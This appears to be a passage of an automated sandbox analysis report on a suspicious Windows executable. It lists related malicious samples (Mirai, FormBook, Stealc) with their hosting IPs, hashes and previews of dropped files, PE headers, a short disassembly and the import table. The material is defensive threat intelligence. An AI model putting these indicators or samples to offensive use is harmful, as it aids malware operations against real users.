                                                                                                                          • 93.127.198.62
                                                                                                                          powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                          • 93.127.133.167
                                                                                                                          copia111224mp.htaGet hashmaliciousUnknownBrowse
                                                                                                                          • 93.127.200.211
                                                                                                                          xd.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                          • 93.127.162.213
                                                                                                                          nullnet_load.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                          • 91.108.78.211
                                                                                                                          Factura-2410-CFDI.batGet hashmaliciousUnknownBrowse
                                                                                                                          • 93.127.200.211
                                                                                                                          JuyR4wj8av.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                          • 93.127.208.30
                                                                                                                          EL7ggW7AdA.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                          • 93.127.208.30
                                                                                                                          arm6.elfGet hashmaliciousUnknownBrowse
                                                                                                                          • 93.127.202.25
                                                                                                                          https://aliceblue-dolphin-702154.hostingersite.com/juno-server-alerts.com/authen.php/Get hashmaliciousUnknownBrowse
                                                                                                                          • 93.127.179.137
                                                                                                                          MULTIBAND-NEWHOPEUSzE1VxVoZ3W.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 209.74.79.42
                                                                                                                          KSts9xW7qy.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 209.74.77.109
                                                                                                                          rQuotation.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 209.74.79.40
                                                                                                                          TNT AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 209.74.64.189
                                                                                                                          z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 209.74.79.41
                                                                                                                          ORDER - 401.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 209.74.77.107
                                                                                                                          SC_TR11670000_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 209.74.64.58
                                                                                                                          PO 1202495088.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 209.74.79.40
                                                                                                                          ORDER-401.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 209.74.77.107
                                                                                                                          Rockwool-Msg-S9039587897.pdfGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                                                                          • 209.74.95.101
                                                                                                                          No context
                                                                                                                          No context
                                                                                                                          Process:C:\Windows\SysWOW64\logman.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):196608
                                                                                                                          Entropy (8bit):1.121297215059106
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                          MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                          SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                          SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                          SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                          Malicious:false
                                                                                                                          Reputation:high, very likely benign file
                                                                                                                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Users\user\Desktop\NWPZbNcRxL.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):287744
                                                                                                                          Entropy (8bit):7.993155747129862
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:6144:AsqKCOddI/n34ZJAzH019+GSfbYur8k8wef5Z:DqPl34ZaGSfbjzAL
                                                                                                                          MD5:4B50DB490ADD7087AF0FEC96F3545047
                                                                                                                          SHA1:D99964957FAD4B53D33F27DCD9FBD9B6F479771C
                                                                                                                          SHA-256:FA3274CD5964F24E178888A4970D106F5987F60DCA1A5B21F794F2AB27D7B7B7
                                                                                                                          SHA-512:A598A308C50213F0FCFFA5347BFF463E5DC8A7551C691A6D3B0205620887980FA20D399A668187BBCFE6AFEB6C53E337BA3CAAC74A090512C3CB572050413FD0
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:...9;D9L0XES..98.9L4XESV.98D9L4XESVM98D9L4XESVM98D9L4XESVM98.9L4VZ.XM.1...5..r.%PKdI>[?72;mZY*W#@x'6v?LVdP"....v V\!.A9RaSVM98D955Q.n6*..$^..8".L..~Y+.B...qY_.#.y31.kQ'QqT?.SVM98D9Ld.ES.L88..hXESVM98D.L6YNR]M9j@9L4XESVM9.P9L4HESV==8D9.4XUSVM;8D?L4XESVM?8D9L4XES&I98F9L4XESTMy.D9\4XUSVM9(D9\4XESVM)8D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM.L!A84XE..I98T9L4.ASV]98D9L4XESVM98D.L48ESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4X
                                                                                                                          Process:C:\Users\user\Desktop\NWPZbNcRxL.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):287744
                                                                                                                          Entropy (8bit):7.993155747129862
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:6144:AsqKCOddI/n34ZJAzH019+GSfbYur8k8wef5Z:DqPl34ZaGSfbjzAL
                                                                                                                          MD5:4B50DB490ADD7087AF0FEC96F3545047
                                                                                                                          SHA1:D99964957FAD4B53D33F27DCD9FBD9B6F479771C
                                                                                                                          SHA-256:FA3274CD5964F24E178888A4970D106F5987F60DCA1A5B21F794F2AB27D7B7B7
                                                                                                                          SHA-512:A598A308C50213F0FCFFA5347BFF463E5DC8A7551C691A6D3B0205620887980FA20D399A668187BBCFE6AFEB6C53E337BA3CAAC74A090512C3CB572050413FD0
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:...9;D9L0XES..98.9L4XESV.98D9L4XESVM98D9L4XESVM98D9L4XESVM98.9L4VZ.XM.1...5..r.%PKdI>[?72;mZY*W#@x'6v?LVdP"....v V\!.A9RaSVM98D955Q.n6*..$^..8".L..~Y+.B...qY_.#.y31.kQ'QqT?.SVM98D9Ld.ES.L88..hXESVM98D.L6YNR]M9j@9L4XESVM9.P9L4HESV==8D9.4XUSVM;8D?L4XESVM?8D9L4XES&I98F9L4XESTMy.D9\4XUSVM9(D9\4XESVM)8D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM.L!A84XE..I98T9L4.ASV]98D9L4XESVM98D.L48ESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4XESVM98D9L4X
                                                                                                                          Process:C:\Users\user\Desktop\NWPZbNcRxL.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):14554
                                                                                                                          Entropy (8bit):7.637138595003517
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:dTYznwMNeAOPPYLDfvWME/eTk5mUOYLHReDoJVt1:dAwJV8DfvWkOLwML
                                                                                                                          MD5:0BAA91776C98B95BE1229940BF548EE9
                                                                                                                          SHA1:CAFF214E1296BE9E4E4AE420721B0D3BBBDC50DA
                                                                                                                          SHA-256:42E5109BA48D4A6F9570B7BC071F80F0597C42B5AB4E50A2710CC28653BD09E2
                                                                                                                          SHA-512:EBA46ABF0597948219BD74836B7F6DB2637EC0694742C90B0923479690957BD4681AE1CF9C86291E0835FF4678903613E989731B0F3F3DA912B69A96C8766E41
                                                                                                                          Malicious:false
                                                                                                                          Preview:EA06..0..Y&.y..+x..f....... .V......71...@.x..L.......*.`......8............`.......Z|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h|!._....ga._.5.1.....`v/.......NA*...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...
                                                                                                                          Process:C:\Users\user\Desktop\NWPZbNcRxL.exe
                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):143378
                                                                                                                          Entropy (8bit):2.7910352400807645
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:mNxyGyDZFuil7LDZGMMVQc3GkcVoudfSq5+vLkHVoqW4/qb35mwBgZihJahYDt07:1
                                                                                                                          MD5:E0BCF9AE3A0681769774291A22605EFE
                                                                                                                          SHA1:D63B5DB4C44584C329074553FBBD894701297BFE
                                                                                                                          SHA-256:DAD35DFA8D6EAF22E9381214B3E5FAF8DE4CBE1717BE3FD76630F7B73CEE64AE
                                                                                                                          SHA-512:92EED1EDC02B454E9CC8B270AF22E09AFEB497FA6FAEC8CEDE366ACCBB6A2581D21AE1119E41F1A019A4AD30DE0F7CB6841C43A30AA1FDBEE8D484FDB0E6E37E
                                                                                                                          Malicious:false
                                                                                                                          Preview:2d0w02d0wx2d0w52d0w52d0w82d0wb2d0we2d0wc2d0w82d0w12d0we2d0wc2d0wc2d0wc2d0w02d0w22d0w02d0w02d0w02d0w02d0w52d0w62d0w52d0w72d0wb2d0w82d0w62d0wb2d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w42d0w52d0w82d0w42d0wb2d0w92d0w62d0w52d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w42d0wd2d0w82d0w62d0wb2d0wa2d0w72d0w22d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w52d0w52d0w82d0w82d0wb2d0w82d0w62d0we2d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w42d0w52d0w82d0wa2d0wb2d0w92d0w62d0w52d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w42d0wd2d0w82d0wc2d0wb2d0wa2d0w62d0wc2d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w52d0w52d0w82d0we2d0wb2d0w82d0w32d0w32d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w42d0w52d0w92d0w02d0wb2d0w92d0w32d0w22d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w42d0wd2d0w92d0w22d0wb2d0wa2d0w22d0we2d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w92d0w52d0w52d0w92d0w42d0wb2d0w82d0w62d0w42d0w02d0w02d0w02d0w02d0w02d0w02d0w62d0w62d0w82d0w9
                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Entropy (8bit):7.1033686237712725
                                                                                                                          TrID:
                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                          File name:NWPZbNcRxL.exe
                                                                                                                          File size:1'255'936 bytes
                                                                                                                          MD5:37148a3441bcc11c173f13e149c7284b
                                                                                                                          SHA1:ad8b541688375bf90cb89eeb94bc8262508401f4
                                                                                                                          SHA256:05cddefc8992523851a932ec1420caf380bd0907ac51d8e8b2a8b41027781c96
                                                                                                                          SHA512:190002fae0cf74dfb17a0d6b2d4b9316ad8c70c21c476def85231fbe501ce08d9bc3acc2b08ec7178163fec39378b83aa4325f802c4be012ac72a6e219b0eb1c
                                                                                                                          SSDEEP:24576:fu6J33O0c+JY5UZ+XC0kGso6FaIlJbZrb8cYZ5qRy61a4oWY:pu0c++OCvkGs9FaInZcma2Y
                                                                                                                          TLSH:13459D32A3DD8360CA675D33FB6D770D6EBB78610630B856DE8C0F79A9E0161162C663
                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
                                                                                                                          Icon Hash:185ada32e9cc368b
                                                                                                                          Entrypoint:0x427dcd
                                                                                                                          Entrypoint Section:.text
                                                                                                                          Digitally signed:false
                                                                                                                          Imagebase:0x400000
                                                                                                                          Subsystem:windows gui
                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                          Time Stamp:0x6756D4D0 [Mon Dec 9 11:30:24 2024 UTC]
                                                                                                                          TLS Callbacks:
                                                                                                                          CLR (.Net) Version:
                                                                                                                          OS Version Major:5
                                                                                                                          OS Version Minor:1
                                                                                                                          File Version Major:5
                                                                                                                          File Version Minor:1
                                                                                                                          Subsystem Version Major:5
                                                                                                                          Subsystem Version Minor:1
                                                                                                                          Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                                                                                          Instruction
                                                                                                                          call 00007F397C6E1A5Ah
                                                                                                                          jmp 00007F397C6D4824h
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          push edi
                                                                                                                          push esi
                                                                                                                          mov esi, dword ptr [esp+10h]
                                                                                                                          mov ecx, dword ptr [esp+14h]
                                                                                                                          mov edi, dword ptr [esp+0Ch]
                                                                                                                          mov eax, ecx
                                                                                                                          mov edx, ecx
                                                                                                                          add eax, esi
                                                                                                                          cmp edi, esi
                                                                                                                          jbe 00007F397C6D49AAh
                                                                                                                          cmp edi, eax
                                                                                                                          jc 00007F397C6D4D0Eh
                                                                                                                          bt dword ptr [004C31FCh], 01h
                                                                                                                          jnc 00007F397C6D49A9h
                                                                                                                          rep movsb
                                                                                                                          jmp 00007F397C6D4CBCh
                                                                                                                          cmp ecx, 00000080h
                                                                                                                          jc 00007F397C6D4B74h
                                                                                                                          mov eax, edi
                                                                                                                          xor eax, esi
                                                                                                                          test eax, 0000000Fh
                                                                                                                          jne 00007F397C6D49B0h
                                                                                                                          bt dword ptr [004BE324h], 01h
                                                                                                                          jc 00007F397C6D4E80h
                                                                                                                          bt dword ptr [004C31FCh], 00000000h
                                                                                                                          jnc 00007F397C6D4B4Dh
                                                                                                                          test edi, 00000003h
                                                                                                                          jne 00007F397C6D4B5Eh
                                                                                                                          test esi, 00000003h
                                                                                                                          jne 00007F397C6D4B3Dh
                                                                                                                          bt edi, 02h
                                                                                                                          jnc 00007F397C6D49AFh
                                                                                                                          mov eax, dword ptr [esi]
                                                                                                                          sub ecx, 04h
                                                                                                                          lea esi, dword ptr [esi+04h]
                                                                                                                          mov dword ptr [edi], eax
                                                                                                                          lea edi, dword ptr [edi+04h]
                                                                                                                          bt edi, 03h
                                                                                                                          jnc 00007F397C6D49B3h
                                                                                                                          movq xmm1, qword ptr [esi]
                                                                                                                          sub ecx, 08h
                                                                                                                          lea esi, dword ptr [esi+08h]
                                                                                                                          movq qword ptr [edi], xmm1
                                                                                                                          lea edi, dword ptr [edi+08h]
                                                                                                                          test esi, 00000007h
                                                                                                                          je 00007F397C6D4A05h
                                                                                                                          bt esi, 03h
                                                                                                                          jnc 00007F397C6D4A58h
                                                                                                                          Programming Language:
                                                                                                                          • [ASM] VS2013 build 21005
                                                                                                                          • [ C ] VS2013 build 21005
                                                                                                                          • [C++] VS2013 build 21005
                                                                                                                          • [ C ] VS2008 SP1 build 30729
                                                                                                                          • [IMP] VS2008 SP1 build 30729
                                                                                                                          • [ASM] VS2013 UPD4 build 31101
                                                                                                                          • [RES] VS2013 build 21005
                                                                                                                          • [LNK] VS2013 UPD4 build 31101
                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x6a078.rsrc
                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x1320000x711c.reloc
                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                          .text0x10000x8dcc40x8de00d28a820a1d9ff26cda02d12b888ba4b4False0.5728679102422908data6.676118058520316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                          .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                          .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                          .rsrc0xc70000x6a0780x6a200fb8c94215630af1f831c623996b79800False0.7748178003533569data7.419965557518136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                          .reloc0x1320000x711c0x72006fcae3cbbf6bfbabf5ec5bbe7cf612c3False0.7650767543859649data6.779031650454199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                          RT_ICON0xc75180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                                                          RT_ICON0xc76400x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                                                          RT_ICON0xc77680x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                                          RT_ICON0xc78900x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024EnglishGreat Britain0.4051418439716312
                                                                                                                          RT_ICON0xc7cf80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096EnglishGreat Britain0.2319418386491557
                                                                                                                          RT_ICON0xc8da00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216EnglishGreat Britain0.16597510373443983
                                                                                                                          RT_ICON0xcb3480x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384EnglishGreat Britain0.12966461974492205
                                                                                                                          RT_ICON0xcf5700x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536EnglishGreat Britain0.08139122205134272
                                                                                                                          RT_MENU0xdfd980x50dataEnglishGreat Britain0.9
                                                                                                                          RT_STRING0xdfde80x594dataEnglishGreat Britain0.3333333333333333
                                                                                                                          RT_STRING0xe037c0x68adataEnglishGreat Britain0.2747909199522103
                                                                                                                          RT_STRING0xe0a080x490dataEnglishGreat Britain0.3715753424657534
                                                                                                                          RT_STRING0xe0e980x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                                          RT_STRING0xe14940x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                                          RT_STRING0xe1af00x466dataEnglishGreat Britain0.3605683836589698
                                                                                                                          RT_STRING0xe1f580x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                                                          RT_RCDATA0xe20b00x4ea74data1.0003290249686496
                                                                                                                          RT_GROUP_ICON0x130b240x4cdataEnglishGreat Britain0.8157894736842105
                                                                                                                          RT_GROUP_ICON0x130b700x14dataEnglishGreat Britain1.25
                                                                                                                          RT_GROUP_ICON0x130b840x14dataEnglishGreat Britain1.15
                                                                                                                          RT_GROUP_ICON0x130b980x14dataEnglishGreat Britain1.25
                                                                                                                          RT_VERSION0x130bac0xdcdataEnglishGreat Britain0.6181818181818182
                                                                                                                          RT_MANIFEST0x130c880x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                                                                                                                          DLLImport
                                                                                                                          WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                                                                                          VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                                                                                          WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                                          COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                                                                          MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                                                                          WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                                                                                          PSAPI.DLLGetProcessMemoryInfo
                                                                                                                          IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                                                                          USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                                                                                          UxTheme.dllIsThemeActive
                                                                                                                          KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
